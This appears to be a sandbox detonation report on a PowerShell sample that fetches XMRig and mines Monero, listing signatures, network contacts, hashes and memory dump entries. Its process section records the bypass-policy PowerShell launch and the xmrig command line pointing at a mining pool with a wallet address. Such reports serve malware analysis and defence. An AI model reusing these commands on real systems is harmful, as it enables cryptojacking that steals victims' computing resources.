memory/1700-120-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-121-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-122-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-123-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-124-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-125-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-126-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-127-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-128-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-129-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-130-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-131-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-132-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-133-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-134-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-135-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-136-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-137-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-138-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-139-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-140-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-141-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-142-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-143-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-144-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-145-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-146-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-147-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-148-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-149-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-150-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-151-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-152-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-153-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-154-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-155-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-156-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-157-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-158-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
Analysis: behavioral25
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 17:19
Platform
win10-20240404-en
Max time kernel
1796s
Max time network
1792s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3296 wrote to memory of 5072 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3296 wrote to memory of 5072 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.143.182.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | tcp | |
| US | 8.8.8.8:53 | 164.189.21.2.in-addr.arpa | udp |
Files
memory/3296-0-0x00007FFE19733000-0x00007FFE19734000-memory.dmp
memory/3296-5-0x000002166CBE0000-0x000002166CC02000-memory.dmp
memory/3296-8-0x00007FFE19730000-0x00007FFE1A11C000-memory.dmp
memory/3296-9-0x000002166CD10000-0x000002166CD86000-memory.dmp
memory/3296-10-0x00007FFE19730000-0x00007FFE1A11C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_y1eyvrmh.eun.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/3296-25-0x00007FFE19730000-0x00007FFE1A11C000-memory.dmp
memory/3296-48-0x000002166CAD0000-0x000002166CAE2000-memory.dmp
memory/3296-61-0x000002166CA60000-0x000002166CA6A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/5072-90-0x0000022282850000-0x0000022282870000-memory.dmp
memory/5072-91-0x00007FF730510000-0x00007FF731143000-memory.dmp
memory/3296-93-0x00007FFE19733000-0x00007FFE19734000-memory.dmp
memory/5072-92-0x00007FF730510000-0x00007FF731143000-memory.dmp
memory/3296-94-0x00007FFE19730000-0x00007FFE1A11C000-memory.dmp
memory/3296-95-0x00007FFE19730000-0x00007FFE1A11C000-memory.dmp
memory/5072-96-0x00007FF730510000-0x00007FF731143000-memory.dmp
memory/5072-97-0x00007FF730510000-0x00007FF731143000-memory.dmp
memory/5072-98-0x00007FF730510000-0x00007FF731143000-memory.dmp
memory/5072-99-0x00007FF730510000-0x00007FF731143000-memory.dmp
memory/5072-100-0x00007FF730510000-0x00007FF731143000-memory.dmp
memory/5072-101-0x00007FF730510000-0x00007FF731143000-memory.dmp
memory/5072-102-0x00007FF730510000-0x00007FF731143000-memory.dmp
memory/5072-103-0x00007FF730510000-0x00007FF731143000-memory.dmp
memory/5072-104-0x00007FF730510000-0x00007FF731143000-memory.dmp
memory/5072-105-0x00007FF730510000-0x00007FF731143000-memory.dmp
memory/5072-106-0x00007FF730510000-0x00007FF731143000-memory.dmp
memory/5072-107-0x00007FF730510000-0x00007FF731143000-memory.dmp
memory/5072-108-0x00007FF730510000-0x00007FF731143000-memory.dmp
memory/5072-109-0x00007FF730510000-0x00007FF731143000-memory.dmp
memory/5072-110-0x00007FF730510000-0x00007FF731143000-memory.dmp
memory/5072-111-0x00007FF730510000-0x00007FF731143000-memory.dmp
memory/5072-112-0x00007FF730510000-0x00007FF731143000-memory.dmp
memory/5072-113-0x00007FF730510000-0x00007FF731143000-memory.dmp
memory/5072-114-0x00007FF730510000-0x00007FF731143000-memory.dmp
memory/5072-115-0x00007FF730510000-0x00007FF731143000-memory.dmp
memory/5072-116-0x00007FF730510000-0x00007FF731143000-memory.dmp
memory/5072-117-0x00007FF730510000-0x00007FF731143000-memory.dmp
memory/5072-118-0x00007FF730510000-0x00007FF731143000-memory.dmp
memory/5072-119-0x00007FF730510000-0x00007FF731143000-memory.dmp
memory/5072-120-0x00007FF730510000-0x00007FF731143000-memory.dmp
memory/5072-121-0x00007FF730510000-0x00007FF731143000-memory.dmp
memory/5072-122-0x00007FF730510000-0x00007FF731143000-memory.dmp
memory/5072-123-0x00007FF730510000-0x00007FF731143000-memory.dmp
memory/5072-124-0x00007FF730510000-0x00007FF731143000-memory.dmp
memory/5072-125-0x00007FF730510000-0x00007FF731143000-memory.dmp
memory/5072-126-0x00007FF730510000-0x00007FF731143000-memory.dmp
memory/5072-127-0x00007FF730510000-0x00007FF731143000-memory.dmp
memory/5072-128-0x00007FF730510000-0x00007FF731143000-memory.dmp
memory/5072-129-0x00007FF730510000-0x00007FF731143000-memory.dmp
memory/5072-130-0x00007FF730510000-0x00007FF731143000-memory.dmp
memory/5072-131-0x00007FF730510000-0x00007FF731143000-memory.dmp
memory/5072-132-0x00007FF730510000-0x00007FF731143000-memory.dmp
memory/5072-133-0x00007FF730510000-0x00007FF731143000-memory.dmp
memory/5072-134-0x00007FF730510000-0x00007FF731143000-memory.dmp
memory/5072-135-0x00007FF730510000-0x00007FF731143000-memory.dmp
memory/5072-136-0x00007FF730510000-0x00007FF731143000-memory.dmp
memory/5072-137-0x00007FF730510000-0x00007FF731143000-memory.dmp
memory/5072-138-0x00007FF730510000-0x00007FF731143000-memory.dmp
memory/5072-139-0x00007FF730510000-0x00007FF731143000-memory.dmp
memory/5072-140-0x00007FF730510000-0x00007FF731143000-memory.dmp
memory/5072-141-0x00007FF730510000-0x00007FF731143000-memory.dmp
memory/5072-142-0x00007FF730510000-0x00007FF731143000-memory.dmp
memory/5072-143-0x00007FF730510000-0x00007FF731143000-memory.dmp
memory/5072-144-0x00007FF730510000-0x00007FF731143000-memory.dmp
memory/5072-145-0x00007FF730510000-0x00007FF731143000-memory.dmp
memory/5072-146-0x00007FF730510000-0x00007FF731143000-memory.dmp
memory/5072-147-0x00007FF730510000-0x00007FF731143000-memory.dmp
memory/5072-148-0x00007FF730510000-0x00007FF731143000-memory.dmp
memory/5072-149-0x00007FF730510000-0x00007FF731143000-memory.dmp
memory/5072-150-0x00007FF730510000-0x00007FF731143000-memory.dmp
memory/5072-151-0x00007FF730510000-0x00007FF731143000-memory.dmp
memory/5072-152-0x00007FF730510000-0x00007FF731143000-memory.dmp
memory/5072-153-0x00007FF730510000-0x00007FF731143000-memory.dmp
memory/5072-154-0x00007FF730510000-0x00007FF731143000-memory.dmp
memory/5072-155-0x00007FF730510000-0x00007FF731143000-memory.dmp
memory/5072-156-0x00007FF730510000-0x00007FF731143000-memory.dmp
Analysis: behavioral28
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 17:19
Platform
win11-20240508-en
Max time kernel
1799s
Max time network
1770s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2492 wrote to memory of 408 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2492 wrote to memory of 408 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
Files
memory/2492-0-0x00007FFB4F743000-0x00007FFB4F745000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4pxmenso.aw4.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2492-8-0x0000019AF6DB0000-0x0000019AF6DD2000-memory.dmp
memory/2492-10-0x00007FFB4F740000-0x00007FFB50202000-memory.dmp
memory/2492-11-0x00007FFB4F740000-0x00007FFB50202000-memory.dmp
memory/2492-12-0x00007FFB4F740000-0x00007FFB50202000-memory.dmp
memory/2492-14-0x0000019AF72B0000-0x0000019AF72C2000-memory.dmp
memory/2492-15-0x0000019AF71A0000-0x0000019AF71AA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/408-46-0x000001BA1B5E0000-0x000001BA1B600000-memory.dmp
memory/408-47-0x000001BA1D0A0000-0x000001BA1D0C0000-memory.dmp
memory/408-48-0x00007FF7DDAC0000-0x00007FF7DE6F3000-memory.dmp
memory/2492-50-0x00007FFB4F743000-0x00007FFB4F745000-memory.dmp
memory/408-52-0x000001BA1D0C0000-0x000001BA1D0E0000-memory.dmp
memory/408-49-0x00007FF7DDAC0000-0x00007FF7DE6F3000-memory.dmp
memory/2492-51-0x00007FFB4F740000-0x00007FFB50202000-memory.dmp
memory/408-53-0x000001BA1D0E0000-0x000001BA1D100000-memory.dmp
memory/2492-54-0x00007FFB4F740000-0x00007FFB50202000-memory.dmp
memory/408-55-0x00007FF7DDAC0000-0x00007FF7DE6F3000-memory.dmp
memory/408-56-0x00007FF7DDAC0000-0x00007FF7DE6F3000-memory.dmp
memory/408-57-0x000001BA1D0C0000-0x000001BA1D0E0000-memory.dmp
memory/408-58-0x000001BA1D0E0000-0x000001BA1D100000-memory.dmp
memory/408-59-0x00007FF7DDAC0000-0x00007FF7DE6F3000-memory.dmp
memory/408-60-0x00007FF7DDAC0000-0x00007FF7DE6F3000-memory.dmp
memory/408-61-0x00007FF7DDAC0000-0x00007FF7DE6F3000-memory.dmp
memory/408-62-0x00007FF7DDAC0000-0x00007FF7DE6F3000-memory.dmp
memory/408-63-0x00007FF7DDAC0000-0x00007FF7DE6F3000-memory.dmp
memory/408-64-0x00007FF7DDAC0000-0x00007FF7DE6F3000-memory.dmp
memory/408-65-0x00007FF7DDAC0000-0x00007FF7DE6F3000-memory.dmp
memory/408-66-0x00007FF7DDAC0000-0x00007FF7DE6F3000-memory.dmp
memory/408-67-0x00007FF7DDAC0000-0x00007FF7DE6F3000-memory.dmp
memory/408-68-0x00007FF7DDAC0000-0x00007FF7DE6F3000-memory.dmp
memory/408-69-0x00007FF7DDAC0000-0x00007FF7DE6F3000-memory.dmp
memory/408-70-0x00007FF7DDAC0000-0x00007FF7DE6F3000-memory.dmp
memory/408-71-0x00007FF7DDAC0000-0x00007FF7DE6F3000-memory.dmp
memory/408-72-0x00007FF7DDAC0000-0x00007FF7DE6F3000-memory.dmp
memory/408-73-0x00007FF7DDAC0000-0x00007FF7DE6F3000-memory.dmp
memory/408-74-0x00007FF7DDAC0000-0x00007FF7DE6F3000-memory.dmp
memory/408-75-0x00007FF7DDAC0000-0x00007FF7DE6F3000-memory.dmp
memory/408-76-0x00007FF7DDAC0000-0x00007FF7DE6F3000-memory.dmp
memory/408-77-0x00007FF7DDAC0000-0x00007FF7DE6F3000-memory.dmp
memory/408-78-0x00007FF7DDAC0000-0x00007FF7DE6F3000-memory.dmp
memory/408-79-0x00007FF7DDAC0000-0x00007FF7DE6F3000-memory.dmp
memory/408-80-0x00007FF7DDAC0000-0x00007FF7DE6F3000-memory.dmp
memory/408-81-0x00007FF7DDAC0000-0x00007FF7DE6F3000-memory.dmp
memory/408-82-0x00007FF7DDAC0000-0x00007FF7DE6F3000-memory.dmp
memory/408-83-0x00007FF7DDAC0000-0x00007FF7DE6F3000-memory.dmp
memory/408-84-0x00007FF7DDAC0000-0x00007FF7DE6F3000-memory.dmp
memory/408-85-0x00007FF7DDAC0000-0x00007FF7DE6F3000-memory.dmp
memory/408-86-0x00007FF7DDAC0000-0x00007FF7DE6F3000-memory.dmp
memory/408-87-0x00007FF7DDAC0000-0x00007FF7DE6F3000-memory.dmp
memory/408-88-0x00007FF7DDAC0000-0x00007FF7DE6F3000-memory.dmp
memory/408-89-0x00007FF7DDAC0000-0x00007FF7DE6F3000-memory.dmp
memory/408-90-0x00007FF7DDAC0000-0x00007FF7DE6F3000-memory.dmp
memory/408-91-0x00007FF7DDAC0000-0x00007FF7DE6F3000-memory.dmp
memory/408-92-0x00007FF7DDAC0000-0x00007FF7DE6F3000-memory.dmp
memory/408-93-0x00007FF7DDAC0000-0x00007FF7DE6F3000-memory.dmp
memory/408-94-0x00007FF7DDAC0000-0x00007FF7DE6F3000-memory.dmp
memory/408-95-0x00007FF7DDAC0000-0x00007FF7DE6F3000-memory.dmp
memory/408-96-0x00007FF7DDAC0000-0x00007FF7DE6F3000-memory.dmp
memory/408-97-0x00007FF7DDAC0000-0x00007FF7DE6F3000-memory.dmp
memory/408-98-0x00007FF7DDAC0000-0x00007FF7DE6F3000-memory.dmp
memory/408-99-0x00007FF7DDAC0000-0x00007FF7DE6F3000-memory.dmp
memory/408-100-0x00007FF7DDAC0000-0x00007FF7DE6F3000-memory.dmp
memory/408-101-0x00007FF7DDAC0000-0x00007FF7DE6F3000-memory.dmp
memory/408-102-0x00007FF7DDAC0000-0x00007FF7DE6F3000-memory.dmp
memory/408-103-0x00007FF7DDAC0000-0x00007FF7DE6F3000-memory.dmp
memory/408-104-0x00007FF7DDAC0000-0x00007FF7DE6F3000-memory.dmp
memory/408-105-0x00007FF7DDAC0000-0x00007FF7DE6F3000-memory.dmp
memory/408-106-0x00007FF7DDAC0000-0x00007FF7DE6F3000-memory.dmp
memory/408-107-0x00007FF7DDAC0000-0x00007FF7DE6F3000-memory.dmp
memory/408-108-0x00007FF7DDAC0000-0x00007FF7DE6F3000-memory.dmp
memory/408-109-0x00007FF7DDAC0000-0x00007FF7DE6F3000-memory.dmp
memory/408-110-0x00007FF7DDAC0000-0x00007FF7DE6F3000-memory.dmp
memory/408-111-0x00007FF7DDAC0000-0x00007FF7DE6F3000-memory.dmp
memory/408-112-0x00007FF7DDAC0000-0x00007FF7DE6F3000-memory.dmp
memory/408-113-0x00007FF7DDAC0000-0x00007FF7DE6F3000-memory.dmp
memory/408-114-0x00007FF7DDAC0000-0x00007FF7DE6F3000-memory.dmp
memory/408-115-0x00007FF7DDAC0000-0x00007FF7DE6F3000-memory.dmp
memory/408-116-0x00007FF7DDAC0000-0x00007FF7DE6F3000-memory.dmp
memory/408-117-0x00007FF7DDAC0000-0x00007FF7DE6F3000-memory.dmp
Analysis: behavioral20
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 17:14
Platform
win11-20240508-en
Max time kernel
1799s
Max time network
1757s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
